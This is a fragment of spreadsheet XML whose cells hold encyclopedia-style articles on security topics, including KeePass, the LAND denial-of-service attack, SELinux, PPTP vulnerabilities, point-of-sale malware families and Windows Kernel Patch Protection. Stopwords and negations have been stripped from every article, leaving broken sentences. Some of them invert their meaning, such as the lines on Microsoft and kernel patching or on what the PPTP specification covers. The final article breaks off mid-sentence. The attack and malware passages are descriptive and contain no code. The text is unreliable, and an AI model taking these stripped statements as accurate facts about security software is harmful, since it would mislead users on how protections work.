    <t>field security engineering, pre-play attack cryptographic attack attacker prepares attack advance carrying simulated transaction pretending device attacked, repeats attack second time real device time likely carry series operations simulation. technique relies able guess content transaction advance, something usually made possible poor choice unpredictability within system. name play "replay attack". pre-play attacks effective chances success slim. references</t>
  </si>
  <si>
    <t>KGraft</t>
  </si>
  <si>
    <t>kgraft feature linux kernel implements live patching running kernel, allows kernel patches applied kernel still running. avoiding need rebooting system kernel contains desired patches, kgraft aims maximize system uptime availability. time, kgraft allows kernel-related security updates applied without deferring scheduled downtimes. internally, kgraft allows entire functions running kernel replaced patched versions, safely selectively using original versions functions ensure per-process consistency live patching performed.kgraft developed suse, source code licensed terms versions three general public license (gpl). april 2014, kgraft submitted inclusion linux kernel mainline, minimalistic foundations live patching merged linux kernel mainline kernel version 4.0, released april 2015. internals internally, kgraft consists parts core kernel module executes live patching mechanism altering kernel's inner workings, userspace utilities prepare individual patch kernel modules source diffs. live kernel patching performed function level, meaning kgraft replace entire functions running kernel patched versions, relying mechanisms infrastructure established ftrace "route around" versions functions. changes kernel's internal data structures possible; however, security patches, natural candidates used kgraft, rarely contain changes kernel's data structures.while applying patches, kgraft require running kernel stopped patched versions functions introduced instead replacing functions atomically, kgraft provides consistent "world views" "universes") userspace processes, kernel threads interrupt handlers, monitored execution original versions patched kernel functions continue used. accomplish that, kgraft maintains original versions patched functions read-copy-update (rcu) fashion, dynamically selects original patched versions depending process, kernel thread interrupt handler executes them. more specifically, original versions functions continue used‍—‌at time patch applied‍—‌for processes currently executing within kernel space, kernel threads reach completion points, currently executing interrupt handlers.due design, kgraft introduce additional latency applying patches. downside, original versions patched kernel functions required maintained extended periods time case processes remain long within kernel space; example, process wait network socket. also, original patched versions functions allowed executed parallel, troubles arise kernel's internal data structures different ways. history suse announced kgraft january 2014 released publicly march 2014 terms general public license version (gplv2) kernel part, terms version (gplv3) userspace part. released shortly released live kernel patching implementation called kpatch. kgraft aims become merged linux kernel mainline, submitted inclusion april 2014.kgraft made available suse linux enterprise server november 2014, additional feature called suse linux enterprise live patching.minimalistic foundations live kernel patching merged linux kernel mainline kernel version 4.0, released april 2015. those foundations, based primarily kernel's ftrace functionality, form common core capable supporting patching kgraft kpatch, providing application programming interface (api) kernel modules contain patches application binary interface (abi) userspace management utilities. however, common core included linux kernel supports architecture provide mechanisms ensuring function-level consistency patches applied.since april 2015, ongoing work porting kgraft common live patching core provided linux kernel mainline. however, implementation required function-level consistency mechanisms delayed call stacks provided linux kernel unreliable situations involve assembly code without proper stack frames; result, porting work remains progress september 2015. attempt improve reliability kernel's call stacks, specialized sanity-check stacktool userspace utility also developed. also dynamic software updating, field research focusing upgrading programs running kexec, method loading whole linux kernel running system ksplice kernelcare, linux kernel live patching technologies developed ksplice, inc. (later acquired oracle) cloudlinux, respectively references external links official website</t>
  </si>
  <si>
    <t>KeePass</t>
  </si>
  <si>
    <t>keepass password safe free open-source password manager primarily windows. officially supports macos linux operating systems mono. additionally, several unofficial ports windows phone, android, ios, blackberry devices. keepass stores usernames, passwords, fields, including free-form notes file attachments, encrypted file. this file protected combination master password, file, current windows account details. default, keepass database stored local file system opposed cloud storage).keepass supports number plugins. password generator synchronization function, supports two-factor authentication, secure desktop mode. two-channel auto-type obfuscation feature offer additional protection keyloggers. keepass import commonly used password managers.a 2017 consumer reports article described keepass four widely used password managers (alongside 1password, dashlane lastpass), "popular among tech enthusiasts" offering level security non-free competitors.a 2019 independent security evaluators study described keepass well widely used password managers unable control windows 10's tendency leave passwords cleartext displayed using windows controlled gui. addition, several github projects (keefarce, keethief, lazanga) specifically attack running keepass steal data host compromised. keepass cannot prevent password theft and, dominik reichl, administrator keepass, states, "neither keepass password manager magically securely spyware-infected, insecure environment." overview import export password list saved default .kdbx file, exported txt, html, csv. output used applications re-imported keepass using plugin. output compatible many password safes like commercial closed-source password keeper closed-source password agent. also, csvs imported spreadsheet applications like microsoft excel openoffice/libreoffice calc. file format support expanded keepass plugins. multi-user support keepass supports simultaneous access simultaneous changes shared password file multiple computers (often using shared network drive), however provisioning access per-group per-entry. 2014, plugins available provisioned multi-user support, exists proprietary password server (pleasant password server) compatible keepass client includes provisioning. auto-type drag drop keepass minimize type information currently selected entry dialogs, webforms, etc. keepass global auto-type key. when keepass running background (with unlocked database) user presses hotkey, looks selected correct) entry enters every login and/or password characters sequence. fields, title, username, password, url, notes, drag dropped windows.windows clipboard handling allows double-clicking field password list copy value windows clipboard. keepass configured randomize characters' input sequence make harder keystrokes. features called two-channel auto-type obfuscation (tcato). clipboard reset keepass automatically clears clipboard time user copied passwords keepass features protection clipboard monitors (other applications notifications clipboard content changed). browser support auto-type functionality works windows, consequently browsers. keeform extension fills user details website form fields automatically. available mozilla firefox, google chrome, microsoft edge. internet explorer also browser integration toolbar available. built-in password generator keepass features built-in password generator generates random passwords. random seeding done user input (mouse movement random keyboard input). plugins keepass plugin architecture. there various plugins available keepass website (such import/export from/to various formats, database backup, integration, automation, etc.). note plugins compromise security keepass, written independent authors full access keepass database. wrapper keepass opensource wrapper, quickeepass, allows keepass efficiently linux. cryptography runtime security according utility's author, keepass first password management utilities security-enhanced password edit controls, case called csecureeditex. author makes several claims regarding security control resistance password revealing utilities; however, author cite make references third-party testing control corroborate claims security.passwords protected memory keepass running. windows vista later versions, passwords encrypted process memory using windows data protection api, allows storing memory protection secure, non-swappable memory area. previous windows systems, keepass falls back using arc4 cipher temporary, random session key. offline security access database restricted master password file. both methods combined create "composite master key". methods used, must present access password database. keepass version introduces third option—dependency upon current windows user. keepass encrypts database aes, twofish chacha20 symmetric cipher, first used cbc/pkcs7 mode. default option keepass editions, twofish available keepass 1.x, chacha20 available keepass 2.35 higher. however, separate plugin provides twofish encryption algorithm keepass 2.x. keepass (kdb database format), integrity data checked using sha-256 hash plaintext, whereas keepass (kdbx database format), authenticity data ensured using hmac-sha-256 hash ciphertext (encrypt-then-mac construction). notable keepass derivatives keepassx, multi-platform open source keepass clone linux macos, built using libraries. december 2021, keepassx longer actively maintained. keepassxc (keepass cross-platform community edition) fork keepassx written c++. keeweb, cross-platform javascript application using keepass database format, desktop version built electron. history keepass time paste-once functionality, single paste operation, clipboard would cleared automatically, removed version incompatibility insufficient effectiveness. also list password managers cryptography references external links official website</t>
  </si>
  <si>
    <t>LAND</t>
  </si>
  <si>
    <t>land (local area network denial) attack (denial service) attack consists sending special poison spoofed packet computer, causing lock security flaw first discovered 1997 someone using alias "m3lt", resurfaced many years later operating systems windows server 2003 windows sp2. mechanism attack involves sending spoofed packet (connection initiation) target host's address open port source destination. this causes machine reply continuously. however, distinct flood vulnerability. other land attacks since found services like snmp windows 88/tcp (kerberos/global services). such systems design flaws would allow device accept request wire appearing themselves, causing repeated replies. vulnerable systems below list vulnerable operating systems: amigaos amitcp (kickstart 3.0) beos preview release powermac bsdi digital freebsd 2.2.5-release (fixed required updates) external jetdirect print servers as/400 os7400 irix mactcp, 7.6.1 opentransport 1.1.2 netapp server 4.1d netbsd (fixed required updates) nextstep novell 4.11 openvms 4.1-7 4.24 rhapsody developer release openserver 5.0.2 smp, 5.0.4 unixware 2.1.1 2.1.2 sunos 4.1.3 4.1.4 windows sp2, prevention most firewalls intercept discard poison packet thus protecting host attack. some operating systems released updates fixing security hole. also slowloris (computer security) high orbit cannon orbit cannon redos denial-of-service attack references external links insecure.org's original post attack article xp's vulnerability</t>
  </si>
  <si>
    <t>KeePassX</t>
  </si>
  <si>
    <t>keepassx started linux port keepass, time open-source windows-only password manager. both cross platform, keepassx using libraries recent versions keepass using .net mono. built using version toolkit, making multi-platform application, linux, windows, macos. keepassx uses keepass (.kdbx) password database format native format. also import (and convert) older keepass (.kdb) databases.as december 2021, keepassx longer actively maintained. there community fork keepassx, called keepassxc. also list password managers password manager cryptography references external links official website keepassx github</t>
  </si>
  <si>
    <t>KG-84</t>
  </si>
  <si>
    <t>kg-84a kg-84c encryption devices developed u.s. national security agency (nsa) ensure secure transmission digital data. kg-84c dedicated loop encryption device (dled), devices general-purpose telegraph encryption equipment (gptee). kg-84a primarily used point-to-point encrypted communications landline, microwave, satellite systems. kg-84c outgrowth u.s. navy high frequency (hf) communications program supports needs. kg-84a kg-84c devices operate simplex, half-duplex, full-duplex modes. kg-84c contains kg-84 kg-84a modes, plus variable update counter, improved performance, synchronous out-of-sync detection, asynchronous cipher text, plain text, bypass, european telex protocol. kg-84 (a/c) certified handle data levels security. kg-84 (a/c) controlled cryptographic item (cci) unclassified unkeyed. keyed kg-84 equipment assumes classification level equal keying material used. characteristics kg-84 physical characteristics height (198 width (191 depth (381 weight data rate kg-84a kbit/s synchronous kbit/s asynchronous kg-84c kbit/s synchronous kbit/s asynchronous power operating temperature operating temperature: mtbf 69,000 hours (7.9 years) also encryption systems external links more info kg-84; also [1].</t>
  </si>
  <si>
    <t>Security switch</t>
  </si>
  <si>
    <t>security switch hardware device designed protect computers, laptops, smartphones similar devices unauthorized access operation, distinct virtual security switch offers software protection. security switches operated authorized user only; reason, isolated devices order prevent unauthorized access possible bypass order prevent malicious manipulation. primary purpose security switch provide protection surveillance, eavesdropping, malware, spyware, theft digital devices. unlike protections techniques, security switch provide protection even security already breached, since access components accessible software. additionally disconnect block peripheral devices, perform "man middle" operations. security switch used human presence detection since initiated human operator. also used firewall. types hardware kill switch hardware kill switch (hks) physical switch cuts signal power line device disable chip running them. examples cellphone compromised malicious software, device initiates video audio recording. when user activates “prevent capture audio/video” mode security switch, either physically disconnects power microphone camera, stops recording. laptop embedded security switch stolen. security switch detects lack communication specific external source hours, responds disconnecting screen, keyboard components, rendering laptop useless, possibility recovery, even full format. user wishes prevent tracking location. user activates geolocation protection security switch disables communication, eliminating possibility tracking device's location. user desires eliminate possibility copied his/her smartphone. they activate secure input function, causing security switch disconnect touch screen operating system, input signals available devices except switch. security switch performs scheduled monitoring finds program attempting download malicious content internet. activates internet security function disables internet access, interrupting download. laptop software compromised air-gap malware, user activate security switch disconnect speaker microphone, establish communication device. history google started work hardware kill switch 2016.in 2019, apple, google, along handful smaller players, designing “kill switches” power microphones cameras devices. googles first product implemented nest max. references external links apple's security chip makes harder macbook mics, wired https://www.wired.com/story/apple-t2-security-chip-macbook-microphone/ hardware trend google apple throwing weight behind, fast company, 2019 https://www.fastcompany.com/90349731/the-hardware-trend-google-amazon-and-apple-are-throwing-their-weight-behind also virtual security switch software ethernet switch embedded security controls human presence detection defense strategy (computing) air-gap malware</t>
  </si>
  <si>
    <t>Pre-boot authentication</t>
  </si>
  <si>
    <t>pre-boot authentication (pba) power-on authentication (poa) serves extension bios, uefi boot firmware guarantees secure, tamper-proof environment external operating system trusted authentication layer. prevents anything read hard disk operating system user confirmed correct password credentials including multi-factor authentication. uses pre-boot authentication full disk encryption outside operating system level encryption temporary files data rest protection encryption cloud servers instances pre-boot authentication process environment serves extension bios, uefi boot firmware guarantees secure, tamper-proof environment external operating system trusted authentication layer. prevents operating system loading user confirmed he/she correct password unlock computer. that trusted layer eliminates possibility millions lines code compromise privacy personal company data. generic boot sequence bios mode: basic input/output system (bios) master boot record (mbr) partition table pre-boot authentication (pba) operating system (os) bootsin uefi mode: uefi (unified extensible firmware interface) guid partition table (gpt) pre-boot authentication (pba) operating system (os) boots pre-boot authentication technologies combinations full disk encryption pre-boot authentication performed add-on operating system like linux initial ramdisk microsoft's boot software system partition boot partition) variety full disk encryption (fde) vendors installed separately operating system. legacy systems tended rely upon primary control. these systems replaced systems using hardware-based dual-factor systems like chips proven cryptographic approaches. however, without form authentication (e.g. fully transparent authentication loading hidden keys), encryption provides little protection advanced attackers authentication-less encryption fully rely post-boot authentication comes active directory authentication gina step windows. security concerns microsoft released bitlocker countermeasures defining protection schemes windows. mobile devices stolen attackers gain permanent physical access (paragraph attacker skill lengthy physical access) microsoft advise pre-boot authentication disable standby power management. pre-boot authentication performed protector party vendor. best security offered offloading cryptographic encryption keys protected client supplying material externally within user authentication process. this method eliminates attacks built-in authentication method weaker brute-force attack symmetric keys used full disk encryption. without cryptographic protection hardware (tpm) supported secure boot environment, easily defeated evil maid style attacks. however, modern hardware (including cryptographic multi-factor authentication) solutions able ensure removal hardware brute-force attacks longer possible. authentication methods standard complement authentication methods exist pre-boot authentication including: something know (e.g. username/password like active directory credentials pin) something (e.g. smart card token) something (e.g. biometric attributes like fingerprint, face recognition, iris scan) automatic authentication trusted zones (e.g. boot provided company devices enterprise network) references</t>
  </si>
  <si>
    <t>Security-Enhanced Linux</t>
  </si>
  <si>
    <t>security-enhanced linux (selinux) linux kernel security module provides mechanism supporting access control security policies, including mandatory access controls (mac). selinux kernel modifications user-space tools added various linux distributions. architecture strives separate enforcement security decisions security policy, streamlines amount software involved security policy enforcement. concepts underlying selinux traced several earlier projects united states national security agency (nsa). overview security-enhanced linux team describes selinux patches linux kernel utilities provide strong, flexible, mandatory access control (mac) architecture major subsystems kernel. provides enhanced mechanism enforce separation information based confidentiality integrity requirements, allows threats tampering, bypassing application security mechanisms, addressed enables confinement damage caused malicious flawed applications. includes sample security policy configuration files designed meet common, general-purpose security goals. linux kernel integrating selinux enforces mandatory access control policies confine user programs system services, well access files network resources. limiting privilege minimum required work reduces eliminates ability programs daemons cause harm faulty compromised (for example buffer overflows misconfigurations). this confinement mechanism operates independently traditional linux (discretionary) access control mechanisms. concept "root" superuser, share well-known shortcomings traditional linux security mechanisms, dependence setuid/setgid binaries. security "unmodified" linux system system without selinux) depends correctness kernel, privileged applications, configurations. fault areas allow compromise entire system. contrast, security "modified" system (based selinux kernel) depends primarily correctness kernel security-policy configuration. while problems correctness configuration applications allow limited compromise individual user programs system daemons, necessarily pose threat security user programs system daemons security system whole. from purist perspective, selinux provides hybrid concepts capabilities drawn mandatory access controls, mandatory integrity controls, role-based access control (rbac), type enforcement architecture. third-party tools enable build variety security policies. history earliest work directed toward standardizing approach providing mandatory discretionary access controls (mac dac) within unix (more precisely, posix) computing environment attributed national security agency's trusted unix (trusix) working group, 1987 1991 published rainbow book (#020a), produced formal model associated evaluation evidence prototype (#020b) ultimately unpublished. selinux designed demonstrate value mandatory access controls linux community controls could added linux. originally, patches make selinux explicitly applied linux kernel source; selinux merged linux kernel mainline series linux kernel. nsa, original primary developer selinux, released first version open source development community december 2000. software merged mainline linux kernel 2.6.0-test3, released august 2003. other significant contributors include hat, network associates, secure computing corporation, tresys technology, trusted computer solutions. experimental ports flask/te implementation made available trustedbsd project freebsd darwin operating systems. security-enhanced linux implements flux advanced security kernel (flask). such kernel contains architectural components prototyped fluke operating system. these provide general support enforcing many kinds mandatory access control policies, including based concepts type enforcement, role-based access control, multilevel security. flask, turn, based dtos, mach-derived distributed trusted operating system, well trusted mach, research project trusted information systems influence design implementation dtos. original external contributors comprehensive list original external contributors selinux hosted website maintenance ceased, sometime 2009. following list reproduces original preserved internet archive wayback machine. scope contributions listed page omitted brevity, accessed archived copy. users, policies security contexts selinux users roles related actual system users roles. every current user process, selinux assigns three string context consisting username, role, domain type). this system flexible normally required: rule, real users share selinux username, access control managed third tag, domain. circumstances process allowed certain domain must configured policies. command runcon allows launching process explicitly specified context (user, role, domain), selinux deny transition approved policy. files, network ports, hardware also selinux context, consisting name, role (seldom used), type. case file systems, mapping files security contexts called labeling. labeling defined policy files also manually adjusted without changing policies. hardware types quite detailed, instance, bin_t (all files folder /bin) postgresql_port_t (postgresql port, 5432). selinux context remote file system specified explicitly mount time. selinux adds switch shell commands others, allowing security context files process seen. typical policy rules consist explicit permissions, example, domains user must possess perform certain actions given target (read, execute, case network port, bind connect), more complex mappings also possible, involving roles security levels. typical policy consists mapping (labeling) file, rule file, interface file, define domain transition. these three files must compiled together selinux tools produce single policy file. resulting policy file loaded kernel make active. loading unloading policies require reboot. policy files either hand written generated user friendly selinux management tool. they normally tested permissive mode first, violations logged allowed. audit2allow tool used later produce additional rules extend policy allow legitimate activities application confined. features selinux features include: clean separation policy enforcement well-defined policy interfaces support applications querying policy enforcing access control (for example, crond running jobs correct context) independence specific policies policy languages independence specific security-label formats contents individual labels controls kernel objects services support policy changes separate measures protecting system integrity (domain-type) data confidentiality (multilevel security) flexible policy controls process initialization inheritance, program execution controls file systems, directories, files, open file descriptors controls sockets, messages, network interfaces controls "capabilities" cached information access-decisions access vector cache (avc) default-deny policy (anything explicitly specified policy disallowed) implementations selinux implemented android since version 4.3.among free community-supported linux distributions, fedora earliest adopters, including support default since fedora core other distributions include support debian version stretch release ubuntu 8.04 hardy heron. version 11.1, opensuse contains selinux "basic enablement". suse linux enterprise features selinux "technology preview".selinux popular systems based linux containers, coreos container linux rkt. useful additional security control help enforce isolation deployed containers host. selinux available since 2005 part enterprise linux (rhel) version future releases. this presence also reflected corresponding versions centos scientific linux. supported policy rhel4 targeted policy aims maximum ease thus restrictive might future versions rhel planned targets targeted policy mean restrictive policies. scenarios selinux potentially control activities system allows user, process, daemon, precise specifications. used confine daemons database engines servers clearly defined data access activity rights. this limits potential harm confined daemon becomes compromised. command-line utilities include:chcon,restorecon,restorecond,runcon,secon,fixfiles,setfiles,load_policy,booleans,getsebool,setsebool,toggleseboolsetenforce, semodule, postfix-nochroot, check-selinux-installation, semodule_package, checkmodule, selinux-config-enforcing,selinuxenabled, selinux-policy-upgrade examples selinux enforcing mode: sudo setenforce query selinux status: getenforce comparison apparmor selinux represents several possible approaches problem restricting actions installed software take. another popular alternative called apparmor available suse linux enterprise server (sles), opensuse, debian-based platforms. apparmor developed component now-defunct immunix linux platform. because apparmor selinux differ radically another, form distinct alternatives software control. whereas selinux re-invents certain concepts provide access expressive policy choices, apparmor designed simple extending administrative semantics used mandatory access control level. there several differences: important difference apparmor identifies file system objects path name instead inode. this means that, example, file inaccessible become accessible apparmor hard link created selinux would deny access newly created hard link. result, apparmor said type enforcement system, files assigned type; instead, merely referenced configuration file. selinux apparmor also differ significantly administered integrate system. since endeavors recreate traditional controls mac-level enforcement, apparmor's operations also considerably smaller available selinux implementations. example, apparmor's operations consist read, write, append, execute, lock, link. most selinux implementations support numbers operations orders magnitude that. example, selinux usually support permissions, also includes controls mknod, binding network sockets, implicit posix capabilities, loading unloading kernel modules, various means accessing shared memory, etc. there controls apparmor categorically bounding posix capabilities. since current implementation capabilities contains notion subject operation (only actor operation) usually layer prevent privileged operations files outside actor's enforced realm control (i.e. "sandbox"). apparmor prevent policy altered, prevent file systems mounted/unmounted, nothing prevent users stepping outside approved realms control. example, deemed beneficial help desk employees change ownership permissions certain files even (for example, departmental file share). administrator want give user(s) root access give cap_fowner cap_dac_override. under selinux administrator platform vendor) configure selinux deny capabilities otherwise unconfined users, create confined domains employee able transition logging exercise capabilities, upon files appropriate type. there notion multilevel security apparmor, thus hard biba enforcement available.. apparmor configuration done using solely regular flat files. selinux default implementations) uses combination flat files (used administrators developers write human readable policy compiled) extended attributes. selinux supports concept "remote policy server" (configurable /etc/selinux/semanage.conf) alternative source policy configuration. central management apparmor usually complicated considerably since administrators must decide configuration deployment tools root allow policy updates) configured manually server. similar systems enhancements isolation processes also accomplished mechanisms virtualization; olpc project, example, first implementation sandboxed individual applications lightweight vservers. also, adopted selinux concepts security-enhanced android.general dynamics builds distributes pitbull trusted operating system, multilevel security (mls) enhancement enterprise linux. multi-category security (mcs) enhancement selinux enterprise linux allows users label files categories, order restrict access discretionary access control type enforcement. categories provide additional compartments within sensitivity levels used multilevel security (mls). also apparmor linux kernel security module astra linux russian linux-based computer operating system star north korean linux-based operating system rule based access control (rsbac) access control framework linux kernel simplified mandatory access control kernel solaris trusted extensions security extensions solaris operating system tomoyo trustedbsd unix security qubes security-focused linux-based operating system references external links official website security-enhanced linux national security agency internet archive selinux github walsh, daniel 2013). "visual how-to guide selinux policy enforcement". opensource.com.</t>
  </si>
  <si>
    <t>Project Dakota</t>
  </si>
  <si>
    <t>project dakota alternative microsoft's windows update developed alek patsouris christopher "doc" harris update windows system drive network drive, without need windows update website. distribution program started january 2008 12:00am. november 2012 project website states project retired completely. purpose project dakota designed for: users format hard disks reinstall windows frequently. system builders network administrators seeking quickly install updates multiple windows pcs. security conscious users wish expose computer internet. users slow connection internet want avoid slow download times using faster connection another computer download project dakota, burn flash drive. users small internet usage want updates. users want faster update windows without connect internet download updates media project dakota able removable media cds, dvds flash drives well able network (mapped drive) local hard disk. background information project dakota came seeing need better method update multiple school computers once, keep track status computers. project dakota achieved creating text files uploaded schools server according hostname.when project adapted general use, project still generated text file, uploaded server details hardware updates installed. many users assumed project dakota obtaining windows product key, case.the project inspired song dakota stereophonics. project history windows version 0.1ab code name: dolphin first version beta copy. released: january 2008 12:00am version 0.1cs code name: strawberry spider fixes bugs first version adds updates. released: january 2008 version 0.2xpas code name: tallawarra fixes bugs, adds updates. released: july 2008 server 2003 version 0.103as code name: windeyer first version. released: july 2008 references external links project dakota homepage project dakota forum</t>
  </si>
  <si>
    <t>KIK-30</t>
  </si>
  <si>
    <t>kik-30 "really simple loader" (raskl) fill device made sypris electronics approved national security agency distribution type cryptographic keys. also store transfer related communications security material, including control data ("load sets") frequency hopping radios, sincgars have quick. store cryptographic keys male female u-229 connectors ds-101 fill protocol, allowing plugged fill devices ekms equipment. 6.14 inches (159 long, weighs less pound (454 powered four batteries. operator interface line characters buttons, sypris calls "1-button squirt" 2-button zeroize (clear memory).a simpler device an/cyz-10, kik-30 planned replace venerable kyk-13 fill devices, $200 million budgeted 2009 procure newer units quantity. references</t>
  </si>
  <si>
    <t>Point-to-Point Tunneling Protocol</t>
  </si>
  <si>
    <t>point-to-point tunneling protocol (pptp) obsolete method implementing virtual private networks. pptp many well known security issues. pptp uses control channel generic routing encapsulation tunnel encapsulate packets. many modern vpns various forms functionality. pptp specification describe encryption authentication features relies point-to-point protocol tunneled implement security functionalities. pptp implementation ships microsoft windows product families implements various levels authentication encryption natively standard features windows pptp stack. intended protocol provide security levels remote access levels comparable typical products. history specification pptp published july 1999 2637 developed vendor consortium formed microsoft, ascend communications (today part nokia), 3com, others. pptp proposed ratified standard internet engineering task force. description pptp tunnel instantiated communication peer port 1723. this connection used initiate manage tunnel peer. pptp packet format standard, including acknowledgement number field replacing typical routing field header. however, normal connection, modified packets directly encapsulated packets, seen protocol number tunnel used carry encapsulated packets, allowing tunnelling protocols carried within ppp, including netbeui ipx. microsoft implementation, tunneled traffic authenticated pap, chap, ms-chap v1/v2 security pptp subject many security analyses serious security vulnerabilities found protocol. known vulnerabilities relate underlying authentication protocols used, design mppe protocol well integration mppe authentication session establishment.a summary vulnerabilities below: ms-chap-v1 fundamentally insecure. tools exist trivially extract password hashes captured mschap-v1 exchange. when using ms-chap-v1, mppe uses session encryption directions communication flow. this cryptanalysed standard methods xoring streams direction together. ms-chap-v2 vulnerable dictionary attacks captured challenge response packets. tools exist perform process rapidly. 2012, demonstrated complexity brute-force attack ms-chap-v2 equivalent brute-force attack single key. online service also demonstrated capable decrypting ms-chap-v2 passphrase hours. mppe uses stream cipher encryption. there method authentication ciphertext stream therefore ciphertext vulnerable bit-flipping attack. attacker could modify stream transit adjust single bits change output stream without possibility detection. these flips detected protocols checksums means.eap-tls seen superior authentication choice pptp; however, requires implementation public-key infrastructure client server certificates. such, viable authentication option remote access installations. most networks pptp apply additional security measures deemed completely inappropriate modern internet environment. time, means negating aforementioned benefits protocol point. also ipsec layer tunneling protocol (l2tp) secure socket tunneling protocol (sstp) openvpn, open source software application implements wireguard, simple effective implementation references external links windows understanding pptp microsoft security flaws microsoft's implementation, bruce schneier, 1998 cryptanalysis microsoft's pptp authentication extensions (ms-chapv2), bruce schneier, 1999</t>
  </si>
  <si>
    <t>KDL</t>
  </si>
  <si>
    <t>(short kernel debug(ger) land) term used beos/haiku possibly operating systems serious kernel error causes computer drop kernel debugger. while brought buggy driver crucial, filesystem driver, escaped (with command 'es'), usually leaves user needing reboot. entering kernel debugger kernel debug(ger) land also entered beos/haiku time pressing alt-sysreq-d keyboard system running. also screen death haiku (operating system) beapi references</t>
  </si>
  <si>
    <t>Self mounting image</t>
  </si>
  <si>
    <t>self mounting image disk image format, commonly found classic platform, encapsulated application mounts file system. when downloaded internet, often bin, binhex stuffit file. despite application, often .smi file extension. disk copy, application commonly used handle disk images classic optional program part standard installation. self mounting images fallen favor arrival copies diskimagemounter, utility mounting disk images.</t>
  </si>
  <si>
    <t>Point-of-sale malware</t>
  </si>
  <si>
    <t>point-of-sale malware (pos malware) usually type malicious software (malware) used cybercriminals target point sale (pos) payment terminals intent obtain credit card debit card information, card's track track data even code, various man-in-the-middle attacks, interception processing retail checkout point sale system. simplest, evasive, approach ram-scraping, accessing system's memory exporting copied information remote access trojan (rat) minimizes software hardware tampering, potentially leaving footprints. attacks also include various bits hardware: dongles, trojan card readers, (wireless) data transmitters receivers. being gateway transactions, malware enables hackers process steal thousands, even millions, transaction payment data, depending upon target, number devices affected, long attack goes undetected. this done outside card information (usually) encrypted sent payment processor authorization. list scraper malware variants rdasrv discovered 2011, installs windows computer service called rdasrv.exe. scans track track credit card data using perl compatible regular expressions includes customer card holder's name, account number, expiry date, code discretionary information. once information gets scraped stored data.txt currentblock.txt sent hacker. alina discovered october 2012 gets installed automatically. gets embedded auto script loads malware memory. then scrapes credit card (cc) data software. vskimmer vskimmer scrapes information windows system detecting card readers attached reader sends captured data cyber criminal control server. dexter discovered december 2012 steal system information along track track card details help keylogger installed onto computer. blackpos spyware, created steal credit debit card information system. blackpos gets stealth-based methods steals information send external server. backoff this memory-scraping malware tracks track data access card magnetic stripe help magnetic stripe readers sends data hacker clone fake credit cards. fastpos fastpos malware malware discovered trend micro researchers. this strikes point sale system fast snatches credit debit card information sends data cyber criminal instantly. malware capability exfiltrate track data using techniques logger memory scraper. punkeypos malware pandalabs discovered malware infects point sale system breach credit debit card details. punkeypos malware uses functions keylogger scraper steal information point sale terminal. once information stolen, encrypted sent cybercriminal's control command server (c&amp;c). multigrain malware this variant malware point sale malware discovered fireeye. follows advanced technique steal retail customer's card information help lunh algorithm. exfiltrate stolen information first block http traffic monitors data exfiltration. belongs family newposthings malware. centerpos malware centerpos (point sale) malware found year 2015 september along malicious malware blackpos, newposthings alina malware fireeye experts. scrapes stolen credit debit card sends data http post request help triple encryption. malumpos malware malumpos point sale malware records point sale's data running oracle micros payment system breached 333,000 data's world. uses delphi programming language stealing credit debit card details. stolen data sent cyber criminal sold black market. also point sale cyber security standards list cyber attack threat trends cyber electronic warfare malware references</t>
  </si>
  <si>
    <t>Privilege separation</t>
  </si>
  <si>
    <t>computer programming computer security, privilege separation software-based technique implementing principle least privilege. with privilege separation, program divided parts limited specific privileges require order perform specific task. this used mitigate potential damage computer security vulnerability. common method implement privilege separation computer program fork processes. main program drops privileges, smaller program keeps privileges order perform certain task. halves communicate socket pair. thus, successful attack larger program gain minimal access, even though pair programs capable performing privileged operations. privilege separation traditionally accomplished distinguishing real user id/group effective user id/group using setuid(2)/setgid(2) related system calls, specified posix. incorrectly positioned, gaps allow widespread network penetration. many network service daemons specific privileged operation open socket internet socket well known ports range. administrative utilities require particular privileges run-time well. such software tends separate privileges revoking completely critical section done, change user runs unprivileged account doing. this action known dropping root unix-like operating systems. unprivileged part usually "nobody" user equivalent separate user account. privilege separation also done splitting functionality single program multiple smaller programs, assigning extended privileges particular parts using file system permissions. that different programs communicate operating system, scope potential vulnerabilities limited (since crash less privileged part cannot exploited gain privileges, merely cause denial-of-service attack). separation privileges major openbsd security features. implementation postfix focused implementing comprehensive privilege separation. another email server software designed privilege separation security mind dovecot. solaris implements separate functions privilege bracketing. also capability-based security confused deputy problem privilege escalation privilege revocation (computing) defensive programming sandbox (computer security) external links theo raadt: exploit mitigation techniques openbsd slides niels provos, markus friedl, peter honeyman: preventing privilege escalation paper niels provos: privilege separated openssh project trusted solaris developer's guide: bracketing effective privileges</t>
  </si>
  <si>
    <t>Kernel Patch Protection</t>
  </si>
  <si>
    <t>kernel patch protection (kpp), informally known patchguard, feature 64-bit (x64) editions microsoft windows prevents patching kernel. first introduced 2005 editions windows windows server 2003 service pack 1."patching kernel" refers unsupported modification central component kernel windows operating system. such modification never supported microsoft because, according microsoft, greatly reduce system security, reliability, performance. although microsoft recommend possible patch kernel editions windows; however, editions windows, microsoft chose implement additional protection technical barriers kernel patching. since patching kernel possible 32-bit (x86) editions windows, several antivirus software developers kernel patching implement antivirus security services. these techniques work computers running editions windows. because this, kernel patch protection resulted antivirus makers redesign software without using kernel patching techniques. however, design windows kernel, kernel patch protection cannot completely prevent kernel patching. this criticism since imperfect defense, problems caused antivirus vendors outweigh benefits authors malicious software simply find ways around defenses. nevertheless, kernel patch protection still prevent problems system stability, reliability, performance caused legitimate software patching kernel unsupported ways. technical overview windows kernel designed device drivers privilege level kernel itself. device drivers expected modify patch core system structures within kernel. however editions windows, windows enforce expectation. result, software, notably certain security antivirus programs, designed perform needed tasks loading drivers modify core kernel structures.in editions windows, microsoft began enforce restrictions structures drivers cannot modify. kernel patch protection technology enforces restrictions. works periodically checking make sure protected system structures kernel modified. modification detected, windows initiate check shut system, blue screen and/or reboot. corresponding bugcheck number 0x109, bugcheck code critical_structure_corruption. prohibited modifications include: modifying system service descriptor tables modifying interrupt descriptor table modifying global descriptor table using kernel stacks allocated kernel modifying patching code contained within kernel itself, ndis kernel librarieskernel patch protection defends device drivers modifying kernel. offer protection device driver patching another.ultimately, since device drivers privilege level kernel itself, impossible completely prevent drivers bypassing kernel patch protection patching kernel. however present significant obstacle successful kernel patching. with highly obfuscated code misleading symbol names, employs security obscurity hinder attempts bypass periodic updates also make "moving target", bypass techniques work likely break next update. since creation 2005, microsoft released major updates kpp, designed break known bypass techniques previous versions. advantages patching kernel never supported microsoft cause number negative effects. kernel patch protection protects negative effects, include: serious errors kernel. reliability issues resulting multiple programs attempting patch parts kernel. compromised system security. rootkits kernel access embed operating system, becoming nearly impossible remove.microsoft's kernel patch protection explains: 